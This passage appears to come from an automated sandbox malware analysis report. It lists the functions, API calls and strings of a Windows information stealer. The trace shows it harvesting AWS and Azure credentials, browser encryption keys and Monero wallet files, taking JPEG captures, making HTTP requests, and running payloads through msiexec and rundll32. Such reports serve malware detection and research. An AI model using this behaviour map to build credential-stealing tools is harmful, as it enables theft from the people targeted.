                      Similarity
                      • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                      • String ID:
                      • API String ID: 3744635739-3916222277
                      • Opcode ID: 5607a3880b307ee113dbfa83c01524da6f3c9f3b9ead4ad25a06b41f897d51db
                      • Instruction ID: 2c332d81e33348ccf4f4476b9629f8defb3a1413796990370aadc8ed095f42cb
                      • Opcode Fuzzy Hash: 5607a3880b307ee113dbfa83c01524da6f3c9f3b9ead4ad25a06b41f897d51db
                      • Instruction Fuzzy Hash: 3FE12271D00109ABDB14EBA0DCA9FEE7B78BF94301F50425AF50663191EF346A4ECB65
                      Function 00558320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                      • RegOpenKeyExA.ADVAPI32(00000000,0102BD10,00000000,00020019,00000000,005605B6), ref: 005583A4
                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00558426
                      • wsprintfA.USER32 ref: 00558459
                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0055847B
                      • RegCloseKey.ADVAPI32(00000000), ref: 0055848C
                      • RegCloseKey.ADVAPI32(00000000), ref: 00558499
                        • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseOpenlstrcpy$Enumwsprintf
                      • String ID: - $%s\%s$?
                      • API String ID: 3246050789-3278919252
                      • Opcode ID: 6eff9636dfc4380b16ecf474006e61e2b971cfbef7a8043e9befca48a4b9f3be
                      • Instruction ID: 4db97ab99808f7c869fc04b5572e0e5550160f43435c2e3f83d23996b033f30c
                      • Opcode Fuzzy Hash: 6eff9636dfc4380b16ecf474006e61e2b971cfbef7a8043e9befca48a4b9f3be
                      • Instruction Fuzzy Hash: 65813E7191011CABEB24DB50CC95FEA7BB8FF48701F10869AE509A6180DF746B89CFA5
                      Function 00554D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00558DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00558E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 00554DB0
                      • lstrcat.KERNEL32(?,\.azure\), ref: 00554DCD
                        • Part of subcall function 00554910: wsprintfA.USER32 ref: 0055492C
                        • Part of subcall function 00554910: FindFirstFileA.KERNEL32(?,?), ref: 00554943
                      • lstrcat.KERNEL32(?,00000000), ref: 00554E3C
                      • lstrcat.KERNEL32(?,\.aws\), ref: 00554E59
                        • Part of subcall function 00554910: StrCmpCA.SHLWAPI(?,00560FDC), ref: 00554971
                        • Part of subcall function 00554910: StrCmpCA.SHLWAPI(?,00560FE0), ref: 00554987
                        • Part of subcall function 00554910: FindNextFileA.KERNEL32(000000FF,?), ref: 00554B7D
                        • Part of subcall function 00554910: FindClose.KERNEL32(000000FF), ref: 00554B92
                      • lstrcat.KERNEL32(?,00000000), ref: 00554EC8
                      • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00554EE5
                        • Part of subcall function 00554910: wsprintfA.USER32 ref: 005549B0
                        • Part of subcall function 00554910: StrCmpCA.SHLWAPI(?,005608D2), ref: 005549C5
                        • Part of subcall function 00554910: wsprintfA.USER32 ref: 005549E2
                        • Part of subcall function 00554910: PathMatchSpecA.SHLWAPI(?,?), ref: 00554A1E
                        • Part of subcall function 00554910: lstrcat.KERNEL32(?,0102FC10), ref: 00554A4A
                        • Part of subcall function 00554910: lstrcat.KERNEL32(?,00560FF8), ref: 00554A5C
                        • Part of subcall function 00554910: lstrcat.KERNEL32(?,?), ref: 00554A70
                        • Part of subcall function 00554910: lstrcat.KERNEL32(?,00560FFC), ref: 00554A82
                        • Part of subcall function 00554910: lstrcat.KERNEL32(?,?), ref: 00554A96
                        • Part of subcall function 00554910: CopyFileA.KERNEL32(?,?,00000001), ref: 00554AAC
                        • Part of subcall function 00554910: DeleteFileA.KERNEL32(?), ref: 00554B31
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                      • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                      • API String ID: 949356159-974132213
                      • Opcode ID: 5e36878ddba73137a2d92696bc24ba1f90c23952e814f20dcd28ba3e36420186
                      • Instruction ID: 7a919fea5a9b5e9bfef41ce02fd9e11c458469b056f20621664041a9f4bf3d11
                      • Opcode Fuzzy Hash: 5e36878ddba73137a2d92696bc24ba1f90c23952e814f20dcd28ba3e36420186
                      • Instruction Fuzzy Hash: 3241A2BA94020967DB10F760EC5BFED3B38BB64705F404595B589660C2FEB457CC8BA2
                      Function 00559010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                      Download Yara Rule
                      APIs
                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0055906C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateGlobalStream
                      • String ID: image/jpeg
                      • API String ID: 2244384528-3785015651
                      • Opcode ID: 6e8f3be0a2c927b0faece115d57adf1fb0814935ee66cb340b0f652a39555fca
                      • Instruction ID: 93335c7fb11d32f14c70677f2e42e07288529cfa08e4425dbb2ee3daccdebc28
                      • Opcode Fuzzy Hash: 6e8f3be0a2c927b0faece115d57adf1fb0814935ee66cb340b0f652a39555fca
                      • Instruction Fuzzy Hash: C4712F71940209EBDB04DFE4DC99FEEBBB8BF88301F108509F515A7290DB38A945CB65
                      Function 00552E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                      • ShellExecuteEx.SHELL32(0000003C), ref: 005531C5
                      • ShellExecuteEx.SHELL32(0000003C), ref: 0055335D
                      • ShellExecuteEx.SHELL32(0000003C), ref: 005534EA
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExecuteShell$lstrcpy
                      • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                      • API String ID: 2507796910-3625054190
                      • Opcode ID: 9c76354a90c07e8aa6f6f5fdd7b9230de9b16b434e2f3fd7194267e923cfbd57
                      • Instruction ID: a302a5010253c0b834bd29173f21d2f69d1744a6aa28ac238cf985029e935c15
                      • Opcode Fuzzy Hash: 9c76354a90c07e8aa6f6f5fdd7b9230de9b16b434e2f3fd7194267e923cfbd57
                      • Instruction Fuzzy Hash: 661212718101199ADB05EBA0DCAAFEEBB78BF54301F50425AF90676191EF342B4ECF52
                      Function 005552C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                        • Part of subcall function 00546280: InternetOpenA.WININET(00560DFE,00000001,00000000,00000000,00000000), ref: 005462E1
                        • Part of subcall function 00546280: StrCmpCA.SHLWAPI(?,0102FC80), ref: 00546303
                        • Part of subcall function 00546280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00546335
                        • Part of subcall function 00546280: HttpOpenRequestA.WININET(00000000,GET,?,0102F320,00000000,00000000,00400100,00000000), ref: 00546385
                        • Part of subcall function 00546280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005463BF
                        • Part of subcall function 00546280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005463D1
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00555318
                      • lstrlen.KERNEL32(00000000), ref: 0055532F
                        • Part of subcall function 00558E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00558E52
                      • StrStrA.SHLWAPI(00000000,00000000), ref: 00555364
                      • lstrlen.KERNEL32(00000000), ref: 00555383
                      • lstrlen.KERNEL32(00000000), ref: 005553AE
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                      • API String ID: 3240024479-1526165396
                      • Opcode ID: 0f8b15ce47b3b9c16b5347a7c6e97546ee7e684227a37ff0cb0be548ad81aede
                      • Instruction ID: 012ba63825d2e8538ef0ddddf5c5deebe3d58c94de7becff272b23bdfae9875a
                      • Opcode Fuzzy Hash: 0f8b15ce47b3b9c16b5347a7c6e97546ee7e684227a37ff0cb0be548ad81aede
                      • Instruction Fuzzy Hash: 8F510C3091014AABDB14EF60C9BAAED7F79BF90302F504119FC065A592EF346B49CB66
                      Function 005512D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpylstrlen
                      • String ID:
                      • API String ID: 2001356338-0
                      • Opcode ID: b524084387941071e12e0c4bd41a86311a532b1dfd9c82142de3eb6b2ab7c76b
                      • Instruction ID: 296a714bd5dc43c63fdc2f07ef4c96f64ced8270be43bc3d61198f381f9cc2ca
                      • Opcode Fuzzy Hash: b524084387941071e12e0c4bd41a86311a532b1dfd9c82142de3eb6b2ab7c76b
                      • Instruction Fuzzy Hash: 66C1D8B590010DABCB14EF60DC9DFEA7B78BF94301F10459AF90A67141EB74AA89CF91
                      Function 00554280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00558DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00558E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 005542EC
                      • lstrcat.KERNEL32(?,0102F398), ref: 0055430B
                      • lstrcat.KERNEL32(?,?), ref: 0055431F
                      • lstrcat.KERNEL32(?,0102DBC8), ref: 00554333
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                        • Part of subcall function 00558D90: GetFileAttributesA.KERNEL32(00000000,?,00541B54,?,?,0056564C,?,?,00560E1F), ref: 00558D9F
                        • Part of subcall function 00549CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00549D39
                        • Part of subcall function 005499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005499EC
                        • Part of subcall function 005499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00549A11
                        • Part of subcall function 005499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00549A31
                        • Part of subcall function 005499C0: ReadFile.KERNEL32(000000FF,?,00000000,0054148F,00000000), ref: 00549A5A
                        • Part of subcall function 005499C0: LocalFree.KERNEL32(0054148F), ref: 00549A90
                        • Part of subcall function 005499C0: CloseHandle.KERNEL32(000000FF), ref: 00549A9A
                        • Part of subcall function 005593C0: GlobalAlloc.KERNEL32(00000000,005543DD,005543DD), ref: 005593D3
                      • StrStrA.SHLWAPI(?,0102F530), ref: 005543F3
                      • GlobalFree.KERNEL32(?), ref: 00554512
                        • Part of subcall function 00549AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NT,00000000,00000000), ref: 00549AEF
                        • Part of subcall function 00549AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00544EEE,00000000,?), ref: 00549B01
                        • Part of subcall function 00549AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NT,00000000,00000000), ref: 00549B2A
                        • Part of subcall function 00549AC0: LocalFree.KERNEL32(?,?,?,?,00544EEE,00000000,?), ref: 00549B3F
                      • lstrcat.KERNEL32(?,00000000), ref: 005544A3
                      • StrCmpCA.SHLWAPI(?,005608D1), ref: 005544C0
                      • lstrcat.KERNEL32(00000000,00000000), ref: 005544D2
                      • lstrcat.KERNEL32(00000000,?), ref: 005544E5
                      • lstrcat.KERNEL32(00000000,00560FB8), ref: 005544F4
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                      • String ID:
                      • API String ID: 3541710228-0
                      • Opcode ID: c32f42d92bf93a4df80de71d32298b7c6946e6d0d550a32ea85576b8222caedf
                      • Instruction ID: 4aee48c8a7bc8eb321a112bb6ac56b08b5e9b097b10628c042f54950b7b1ada8
                      • Opcode Fuzzy Hash: c32f42d92bf93a4df80de71d32298b7c6946e6d0d550a32ea85576b8222caedf
                      • Instruction Fuzzy Hash: 3D717A76900209B7DB14EBB0DC5AFEE7778BB88305F008599F60597181EA34DB49CFA1
                      Function 00541310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 005412A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 005412B4
                        • Part of subcall function 005412A0: RtlAllocateHeap.NTDLL(00000000), ref: 005412BB
                        • Part of subcall function 005412A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 005412D7
                        • Part of subcall function 005412A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 005412F5
                        • Part of subcall function 005412A0: RegCloseKey.ADVAPI32(?), ref: 005412FF
                      • lstrcat.KERNEL32(?,00000000), ref: 0054134F
                      • lstrlen.KERNEL32(?), ref: 0054135C
                      • lstrcat.KERNEL32(?,.keys), ref: 00541377
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                        • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                        • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                        • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                        • Part of subcall function 00558B60: GetSystemTime.KERNEL32(00560E1A,0102EBC0,005605AE,?,?,005413F9,?,0000001A,00560E1A,00000000,?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 00558B86
                        • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                        • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00541465
                        • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                        • Part of subcall function 005499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005499EC
                        • Part of subcall function 005499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00549A11
                        • Part of subcall function 005499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00549A31
                        • Part of subcall function 005499C0: ReadFile.KERNEL32(000000FF,?,00000000,0054148F,00000000), ref: 00549A5A
                        • Part of subcall function 005499C0: LocalFree.KERNEL32(0054148F), ref: 00549A90
                        • Part of subcall function 005499C0: CloseHandle.KERNEL32(000000FF), ref: 00549A9A
                      • DeleteFileA.KERNEL32(00000000), ref: 005414EF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
